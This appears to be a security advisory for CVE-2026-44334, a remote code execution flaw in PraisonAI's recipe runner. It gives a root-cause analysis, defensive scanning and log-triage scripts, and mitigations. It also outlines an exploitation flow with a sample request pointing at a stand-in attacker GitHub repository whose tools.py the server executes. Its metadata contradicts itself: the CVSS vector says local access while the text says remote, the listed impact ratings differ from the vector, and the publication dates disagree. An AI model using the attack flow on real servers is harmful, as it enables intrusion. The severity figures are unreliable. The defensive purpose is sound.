
CVE-2026-44334: Praison Praisonai RCE Vulnerability

CVE-2026-44334 is a remote code execution flaw in Praison Praisonai that allows unauthenticated attackers to execute arbitrary code via unguarded tool imports. This post covers technical details, affected versions, and mitigations.

Published: May 18, 2026

CVE-2026-44334 Overview

CVE-2026-44334 is a code injection vulnerability [CWE-94] in PraisonAI, a multi-agent teams system. The flaw affects versions 4.5.139 through 4.6.31. An earlier fix for CVE-2026-40287 gated tools.py auto-import behind the PRAISONAI_ALLOW_LOCAL_TOOLS=true environment variable in tool_resolver.py and api/call.py. A third import sink in praisonai/templates/tool_override.py was missed and remains unguarded. The recipe runner reaches this sink on every recipe execution. Attackers can trigger it remotely via POST /v1/recipes/run by pointing the recipe value at any local absolute path or GitHub repository, because SecurityConfig.allow_any_github defaults to True.

Critical Impact

Unauthenticated attackers can achieve arbitrary code execution by dropping a malicious tools.py next to TEMPLATE.yaml, which the server then loads via exec_module().

Affected Products

  • PraisonAI versions 4.5.139 through 4.6.31
  • Deployments exposing the /v1/recipes/run API endpoint
  • Instances relying on default SecurityConfig.allow_any_github=True

Discovery Timeline

  • 2026-05-08 - CVE-2026-44334 published to NVD
  • 2026-05-08 - Last updated in NVD database

Technical Details for CVE-2026-44334

Vulnerability Analysis

The vulnerability stems from an incomplete remediation of CVE-2026-40287. The original fix introduced an environment variable gate, PRAISONAI_ALLOW_LOCAL_TOOLS, to restrict automatic loading of tools.py files alongside recipe templates. The fix applied this gate to tool_resolver.py and api/call.py. However, praisonai/templates/tool_override.py contains a third import sink that was overlooked. This sink imports user-supplied Python modules without checking the opt-in flag.

The recipe runner invokes this code path on every recipe execution. The POST /v1/recipes/run endpoint accepts a recipe parameter referencing either a local absolute path or a GitHub repository URL. The server fetches the referenced repository or reads the local directory, then loads any adjacent tools.py file using Python's exec_module(). No authentication is required by default. No environment opt-in is required to reach the vulnerable code path.

Root Cause

The root cause is an incomplete security control. The patch for CVE-2026-40287 missed an additional import location in the template override module. The CWE-94 classification reflects improper control of code generation, where untrusted Python source is executed as part of normal application flow.
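An incomplete gate like this can be hunted for mechanically. The following is an added example, not PraisonAI code or the maintainers' tooling: a small AST scan that lists every function calling exec_module() without referencing the PRAISONAI_ALLOW_LOCAL_TOOLS flag. The two sample sources are constructed stand-ins and their function names are hypothetical.

```python
import ast

GATE = "PRAISONAI_ALLOW_LOCAL_TOOLS"  # opt-in flag named in the advisory
SINK = "exec_module"                  # dynamic-import call named in the advisory

# Constructed stand-ins (not PraisonAI source; function names are hypothetical).
SAMPLE_SOURCES = {
    "tool_resolver.py": '''
import os, importlib.util
def load_tools(path):
    if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":
        return None
    spec = importlib.util.spec_from_file_location("tools", path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod
''',
    "tool_override.py": '''
import importlib.util
def load_override(path):
    spec = importlib.util.spec_from_file_location("tools", path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod
''',
}

def _calls_sink(func):
    return any(isinstance(n, ast.Call) and isinstance(n.func, ast.Attribute)
               and n.func.attr == SINK for n in ast.walk(func))

def _mentions_gate(func):
    return any(isinstance(n, ast.Constant) and n.value == GATE
               for n in ast.walk(func))

def unguarded_sinks(sources):
    """Return sorted (file, function, line) for each function that calls the sink
    without naming the gate. Gates in helpers are not seen: review each finding."""
    findings = []
    for name, text in sources.items():
        for node in ast.walk(ast.parse(text, filename=name)):
            if (isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))
                    and _calls_sink(node) and not _mentions_gate(node)):
                findings.append((name, node.name, node.lineno))
    return sorted(findings)

if __name__ == "__main__":
    for finding in unguarded_sinks(SAMPLE_SOURCES):
        print("unguarded import sink: %s:%s (line %d)" % finding)
```

Run against a real checkout by reading each .py file into the `sources` mapping; an empty result after a fix is the regression check that no import sink was left outside the gate.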

Attack Vector

An attacker hosts a public GitHub repository containing a TEMPLATE.yaml file and a malicious tools.py file. The attacker sends a POST request to /v1/recipes/run with the recipe field set to the repository URL. The PraisonAI server clones the repository and executes the recipe. During execution, tool_override.py imports tools.py, invoking exec_module() on attacker-controlled Python code. The attacker gains code execution in the context of the PraisonAI process.

Exploitation flow (described in prose; no verified PoC code available):

  1. Attacker creates GitHub repo with TEMPLATE.yaml + malicious tools.py
  2. POST /v1/recipes/run { "recipe": "https://github.com/attacker/repo" }
  3. Server fetches repo, recipe runner invokes tool_override.py
  4. Unguarded import sink calls exec_module() on tools.py
  5. Arbitrary Python executes in server context

Detection Methods for CVE-2026-44334

Indicators of Compromise

  • Unexpected outbound connections from PraisonAI hosts to GitHub repositories not authorized by the organization
  • Presence of unfamiliar tools.py files in recipe template directories
  • Process spawns from the PraisonAI service account that deviate from baseline behavior
  • Access log entries for POST /v1/recipes/run referencing external or untrusted recipe sources

Detection Strategies

  • Inspect web server and reverse proxy logs for POST /v1/recipes/run requests with recipe values containing absolute filesystem paths or arbitrary GitHub URLs
  • Monitor for child processes spawned by the PraisonAI runtime that perform network connections, shell execution, or filesystem modification outside expected recipe behavior
  • Audit recipe template directories for newly written tools.py files and compare hashes against known-good templates

Monitoring Recommendations

  • Enable application-level logging that captures the full recipe argument for every /v1/recipes/run invocation
  • Forward PraisonAI host telemetry to a centralized data lake for correlation between HTTP requests and subsequent process activity
  • Alert on any invocation of importlib or exec_module paths originating from tool_override.py if instrumentation is available
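
The log inspection described under Detection Strategies and Monitoring Recommendations can be automated once the recipe argument is logged. The following is an added example, not part of the original advisory or of PraisonAI: it assumes a JSON-lines application log whose field names (ts, src, method, path, recipe) are hypothetical, and an owner allowlist you maintain yourself. The sample log lines are constructed.

```python
import json
import re
from urllib.parse import urlsplit

ALLOWED_GITHUB_OWNERS = {"example-org"}  # assumption: owners your organization trusts
ABSOLUTE_PATH = re.compile(r"^(/|[A-Za-z]:[\\/])")  # POSIX root or Windows drive
# Constructed sample: JSON application log, one event per line (field names assumed).
SAMPLE_LOG = """
{"ts":"2026-05-10T09:14:02Z","src":"10.0.4.17","method":"POST","path":"/v1/recipes/run","recipe":"support-triage"}
{"ts":"2026-05-10T09:20:41Z","src":"203.0.113.50","method":"POST","path":"/v1/recipes/run","recipe":"/tmp/uploads/r1"}
{"ts":"2026-05-10T09:21:07Z","src":"203.0.113.50","method":"POST","path":"/v1/recipes/run","recipe":"https://github.com/attacker/repo"}
{"ts":"2026-05-10T09:30:00Z","src":"10.0.4.17","method":"POST","path":"/v1/recipes/run","recipe":"https://github.com/example-org/recipes"}
{"ts":"2026-05-10T09:31:12Z","src":"10.0.4.22","method":"GET","path":"/health"}
truncated line that is not JSON
"""

def classify_recipe(value):
    """Return a reason string for a suspicious recipe value, else None."""
    if ABSOLUTE_PATH.match(value):
        return "absolute-path"
    try:
        url = urlsplit(value)
    except ValueError:
        return "unparseable-url"
    if url.scheme in ("http", "https") and url.hostname:
        if url.hostname.lower() in ("github.com", "www.github.com"):
            owner = url.path.strip("/").split("/")[0].lower()
            return None if owner in ALLOWED_GITHUB_OWNERS else "untrusted-github"
        return "external-url"
    return None

def triage(log_text):
    """Return (ts, src, reason, recipe) for each suspicious /v1/recipes/run POST."""
    hits = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or malformed line
        if not isinstance(event, dict) or event.get("method") != "POST" \
                or event.get("path") != "/v1/recipes/run":
            continue
        recipe = event.get("recipe")
        reason = classify_recipe(recipe) if isinstance(recipe, str) else "missing-recipe"
        if reason:
            hits.append((event.get("ts"), event.get("src"), reason, recipe))
    return hits

if __name__ == "__main__":
    print(*triage(SAMPLE_LOG), sep="\n")
```

Each hit carries the timestamp and source address needed to correlate the request with process activity on the PraisonAI host in the following minutes.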

How to Mitigate CVE-2026-44334

Immediate Actions Required

  • Upgrade PraisonAI to version 4.6.32 or later, which closes the unguarded import sink in tool_override.py
  • Restrict network access to the /v1/recipes/run endpoint until the upgrade is complete
  • Set SecurityConfig.allow_any_github to False to prevent loading recipes from arbitrary GitHub repositories
  • Enforce authentication on the PraisonAI API surface; the default configuration requires no authentication

Patch Information

The maintainers patched this issue in PraisonAI version 4.6.32. The fix extends the PRAISONAI_ALLOW_LOCAL_TOOLS gate to the third import sink in praisonai/templates/tool_override.py. See the GitHub Security Advisory GHSA-xcmw-grxf-wjhj for full details.

Workarounds

  • Place PraisonAI behind a reverse proxy that requires authentication and blocks external access to /v1/recipes/run
  • Restrict recipe sources to a maintained allowlist of internal Git repositories by overriding SecurityConfig.allow_any_github
  • Run the PraisonAI service under a low-privilege account with no write access to sensitive paths and no outbound network egress beyond required dependencies

```bash
# Configuration example - upgrade and restrict recipe sources
pip install --upgrade 'praisonai>=4.6.32'

# Disable arbitrary GitHub recipe loading in SecurityConfig
export PRAISONAI_ALLOW_ANY_GITHUB=false
export PRAISONAI_ALLOW_LOCAL_TOOLS=false
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Vulnerability Details

  • Type: RCE
  • Vendor/Tech: Praisonai
  • Severity: HIGH
  • CVSS Score: 8.4
  • EPSS Probability: 0.02%
  • Known Exploited: No

CVSS Vector

  • CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Impact Assessment

  • Confidentiality: Low
  • Integrity: None
  • Availability: High

CWE References

  • CWE-94

Vendor Resources

  • GitHub Security Advisory

Related CVEs

  • CVE-2026-40287: PraisonAI RCE Vulnerability
  • CVE-2026-40288: PraisonAI YAML Workflow RCE Vulnerability
  • CVE-2026-40156: PraisonAI RCE Vulnerability
  • CVE-2026-40158: PraisonAI Sandbox Bypass RCE Vulnerability